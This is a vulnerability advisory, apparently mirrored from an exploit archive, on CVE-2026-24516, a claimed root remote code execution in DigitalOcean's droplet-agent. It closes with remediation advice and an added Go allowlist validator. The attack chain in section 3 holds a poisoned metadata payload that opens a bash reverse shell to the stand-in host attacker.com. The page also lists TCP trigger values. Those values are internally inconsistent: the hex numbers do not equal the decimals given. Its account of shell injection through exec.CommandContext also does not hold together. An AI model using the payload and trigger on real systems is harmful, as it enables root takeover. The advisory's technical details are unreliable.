## https://sploitus.com/exploit?id=PACKETSTORM:218360
# CVE-2026-24516-DigitalOcean-RCE.
    Technical analysis and PoC for CVE-2026-24516: Unauthenticated Root Remote Code Execution in DigitalOcean Droplet Agent (CVSS 10.0).
    ================================================================================
    TECHNICAL SECURITY ADVISORY: CVE-2026-24516
    ================================================================================
    ID:             CVE-2026-24516
    
    TITLE:          Unauthenticated Root RCE via Metadata Poisoning & Side-Channel
    
    SEVERITY:       Critical (CVSS v3.1: 10.0 / AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
    
    RESEARCHER:     Anmol Singh Rajput (@poxsky)
    
    AFFECTED:       DigitalOcean Droplet Agent (droplet-agent) <= v1.3.2
    
    ================================================================================
    
    1. ARCHITECTURAL OVERVIEW
    -------------------------
    The 'droplet-agent' is a privileged system daemon (UID 0) designed for remote 
    telemetry and diagnostics. It maintains a passive monitoring state until a 
    specific signaling sequence is received. The core vulnerability lies in the 
    "Implicit Trust Model" of the link-local metadata service (169.254.169.254), 
    which lacks cryptographic integrity checks.
    
    2. DEEP DIVE: EXPLOIT PRIMITIVES
    -------------------------------
    
    A. PASSIVE TCP SIDE-CHANNEL (THE SIGNALING LAYER)
    The agent uses a raw socket listener (internal/metadata/watcher/ssh_watcher.go) 
    on port 22 and transitions from IDLE to ACTIVE when it observes hardcoded 
    magic constants in the TCP header:
    - Sequence Number (Seq): 0x419AD37 (68796879 -> "DODO")
    - Acknowledgment Number (Ack): 0xCF259 (848489 -> "TTY")
    
    Analysis: This creates a deterministic trigger. An external attacker can 
    impersonate the infrastructure control plane by spoofing a single TCP SYN 
    packet with these magic values.
    
    
    
    B. TRUST BOUNDARY VIOLATION (THE LINK-LOCAL FLAW)
    Upon signaling, the agent fetches JSON instructions from the cloud metadata 
    endpoint. The vulnerability is a lack of authenticity verification: the agent 
    treats the 169.254.169.254 zone as a "Hardened Trusted Zone" and never checks 
    payload signatures (HMAC/mTLS).
    
    
    
    C. THE SINK: UNSANITIZED COMMAND INJECTION
    The 'TroubleshootingActioner' (internal/troubleshooting/actioner/actioner.go) 
    parses the 'requesting' array and passes its contents to a command-execution sink. 
    - Vulnerable Sink: exec.CommandContext(ctx, name, args...)
    - Logic Flaw: The validation logic only performs a prefix check ('command:'). 
      It neither tokenizes the input nor rejects shell metacharacters (;, |, &, $).
    
    3. WEAPONIZED ATTACK CHAIN (SSRF-TO-ROOT-RCE)
    ---------------------------------------------
    1. IMPERSONATION: Attacker identifies an SSRF in a hosted application to proxy 
       requests to the link-local metadata service.
    2. POISONING: Attacker sets up a malicious metadata server returning:
       {"requesting": ["command:bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'"]}
    3. THE KNOCK: Attacker sends the "DODO-TTY" TCP trigger to Port 22.
    4. EXECUTION: The agent fetches the poisoned JSON and executes the reverse 
       shell with EFFECTIVE UID 0 (Root).
    
    
    
    4. IMPACT ASSESSMENT
    --------------------
    - TOTAL SYSTEM COMPROMISE: Full kernel-level access.
    - PERSISTENCE: Ability to inject rootkits or persistent SSH backdoors.
    - TENANT RISK: A single SSRF in any customer app leads to a full droplet 
      takeover, bypassing all OS-level firewalls.
    
    5. REMEDIATION STRATEGY
    -----------------------
    - CRYPTOGRAPHIC INTEGRITY: Implement JWT/HMAC signing for all metadata payloads.
    - NAMESPACE ISOLATION: Run the actioner in a restricted PID/Network namespace.
    - ALLOWLISTING: Hardcode a set of immutable diagnostic binaries; reject all 
      dynamic string inputs.
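    The allowlisting control from section 5, applied to the 'requesting' sink described in section 2C, as an added Go example that is not droplet-agent's own code. The allowlist contents, the function name and the treatment of the 'command:' prefix are assumptions for illustration; the point is that the prefix check becomes the first of three gates rather than the only one, and that no shell is ever invoked.

```go
package main

import (
	"fmt"
	"strings"
)

// Diagnostic binaries the actioner may run, keyed by absolute path so PATH
// lookup cannot be abused. Assumed entries for this example, not the real list.
var allowedBinaries = map[string]bool{"/usr/bin/df": true, "/usr/bin/uptime": true}

// Shell metacharacters from section 2C; a token containing one is rejected
// outright rather than "sanitized".
const shellMeta = ";|&$`<>()"

// ValidateRequesting vets each entry of a "requesting" array and returns argv
// slices fit for exec.CommandContext(ctx, argv[0], argv[1:]...). No shell is
// involved, so quotes in the input stay literal bytes.
func ValidateRequesting(entries []string) ([][]string, error) {
	var argvs [][]string
	for _, e := range entries {
		// The prefix check is the page's only gate; here it is the first of three.
		if !strings.HasPrefix(e, "command:") {
			return nil, fmt.Errorf("entry %q lacks command: prefix", e)
		}
		argv := strings.Fields(strings.TrimPrefix(e, "command:"))
		if len(argv) == 0 {
			return nil, fmt.Errorf("entry %q has no command", e)
		}
		if !allowedBinaries[argv[0]] {
			return nil, fmt.Errorf("binary %q is not allowlisted", argv[0])
		}
		for _, tok := range argv {
			if strings.ContainsAny(tok, shellMeta) {
				return nil, fmt.Errorf("token %q contains shell metacharacters", tok)
			}
		}
		argvs = append(argvs, argv)
	}
	return argvs, nil
}

func main() {
	// Constructed inputs: one benign diagnostic and two that must be refused.
	for _, in := range []string{"command:/usr/bin/df -h", "command:bash -c id", "command:/usr/bin/df -h; id"} {
		argv, err := ValidateRequesting([]string{in})
		fmt.Printf("%q -> argv=%v err=%v\n", in, argv, err)
	}
}
```

    A batch is rejected as a whole on the first bad entry, so the actioner fails closed rather than running the "good" part of a poisoned payload.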
    
    